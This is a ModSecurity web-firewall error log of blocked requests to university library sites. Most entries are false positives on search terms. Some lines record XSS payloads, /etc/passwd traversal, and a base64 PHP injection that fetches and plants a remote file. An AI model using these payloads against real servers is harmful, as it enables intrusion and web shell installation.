[Tue Aug 29 11:57:27.533259 2023] [:error] [pid 2786] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAAriwggAAAAK"]
[Tue Aug 29 11:57:30.535425 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArh0UQAAAAC"]
[Tue Aug 29 11:57:30.550221 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAAnEqeUAAAAO"]
[Tue Aug 29 11:57:30.604643 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/listing/"] [unique_id "ZO16usCo-f0AAAocytcAAAAR"]
[Tue Aug 29 11:57:31.588313 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22//\\x0d\\x0a);//\\x22\\x22>< found within ARGS:items[ITEMS][ID]: <img src=\\x22//\\x0d\\x0a);//\\x22\\x22><div>x\\x0d\\x0a});var BX = window.BX;window.BX = function(node, bCache){};BX.ready = function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16u8Co-f0AAAnEqeoAAAAO"]
[Tue Aug 29 11:57:32.743457 2023] [:error] [pid 2785] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16vMCo-f0AAArh0VYAAAAC"]
[Tue Aug 29 11:57:33.542164 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ccmadmin/bulkvivewfilecontents.do"] [unique_id "ZO16vcCo-f0AAAq@sroAAAAM"]
[Tue Aug 29 14:08:17.427642 2023] [:error] [pid 5158] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22hukum normatif\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2ZYcCo-f0AABQmpkkAAAAT"]
[Tue Aug 29 15:40:20.082883 2023] [:error] [pid 7893] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PENGANTAR ILMU EKONOMI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2u9MCo-f0AAB7VO80AAAAP"]
[Mon Aug 28 09:23:34.895432 2023] [:error] [pid 39363] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ISJONI, DKK.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwFJsCo-f0AAJnDDZ4AAAAK"]
[Mon Aug 28 09:57:47.305826 2023] [:error] [pid 39800] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22TASWAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwNK8Co-f0AAJt4ULgAAAAP"]
[Mon Aug 28 10:25:46.110530 2023] [:error] [pid 40255] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22IPS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwTusCo-f0AAJ0-jBwAAAAJ"]
[Mon Aug 28 10:43:33.857962 2023] [:error] [pid 40580] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SRI SULISTYORINI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwX5cCo-f0AAJ6E4R8AAAAJ"]
[Mon Aug 28 11:55:49.461391 2023] [:error] [pid 41934] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SOEDJADI DKK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwo1cCo-f0AAKPOc40AAAAt"]
[Mon Aug 28 12:39:57.431310 2023] [:error] [pid 42797] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KURIKULUM PEMBELAJARAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwzLcCo-f0AAKctKr8AAAAQ"]
[Mon Aug 28 12:48:31.616334 2023] [:error] [pid 43062] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HAY DK.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOw1L8Co-f0AAKg21TsAAAAG"]
[Mon Aug 28 14:12:03.436240 2023] [:error] [pid 44629] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22A. DUNIA, FIRDAUS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxIw8Co-f0AAK5VOwIAAAAE"]
[Mon Aug 28 14:27:54.696213 2023] [:error] [pid 44950] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PSIKOLOGI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxMesCo-f0AAK@WTJkAAAAH"]
[Mon Aug 28 14:38:02.357701 2023] [:error] [pid 45118] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SUDJATMIKO, PONCO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxO2sCo-f0AALA@ieoAAAAP"]
[Mon Aug 28 14:54:24.502410 2023] [:error] [pid 45521] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SURAKHMAD, WINARNO DK.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxSsMCo-f0AALHRl7QAAAAR"]
[Mon Aug 28 14:59:26.545163 2023] [:error] [pid 45463] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PENELITIAN KUALITATIF\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxT3sCo-f0AALGXDA0AAAAg"]
[Mon Aug 28 15:00:44.150141 2023] [:error] [pid 45598] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MANAJEMEN OPERASIONAL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxULMCo-f0AALIePiUAAAAG"]
[Mon Aug 28 20:12:36.312653 2023] [:error] [pid 51318] [client 103.195.58.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0xhbmFuZ0FraXJhL09uaUNoYW4vbWFpbi9vb3BzLnBocCIsImF3ZXNhLnBocCIpKSB7CgllY2hvICJMYW5hbmdHYW50ZW5nIjsKfSBlbHNlIHsKCWVjaG8gImZhaWwiOwp9Cj8 ')); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWAS [hostname "digilibfkip.unla.ac.id"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZOydRMCo-f0AAMh2TGgAAAAE"]
[Mon Aug 28 20:36:28.789754 2023] [:error] [pid 51736] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22AQIB, ZAINAL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyi3MCo-f0AAMoYFocAAAAH"]
[Mon Aug 28 20:38:06.059948 2023] [:error] [pid 51981] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22CAMPBELL DKK\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyjPsCo-f0AAMsN4QwAAAAC"]
[Mon Aug 28 21:17:07.043559 2023] [:error] [pid 52539] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22BUDININGSIH, C. ASRI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOysY8Co-f0AAM07PbIAAAAQ"]
[Mon Aug 28 21:27:59.113359 2023] [:error] [pid 52781] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22KARIADINATA, RAHAYU\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyu78Co-f0AAM4tj@4AAAAE"]
[Mon Aug 28 22:12:26.467416 2023] [:error] [pid 53464] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22KELAYAKAN BISNIS\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy5WsCo-f0AANDY@CYAAAAF"]
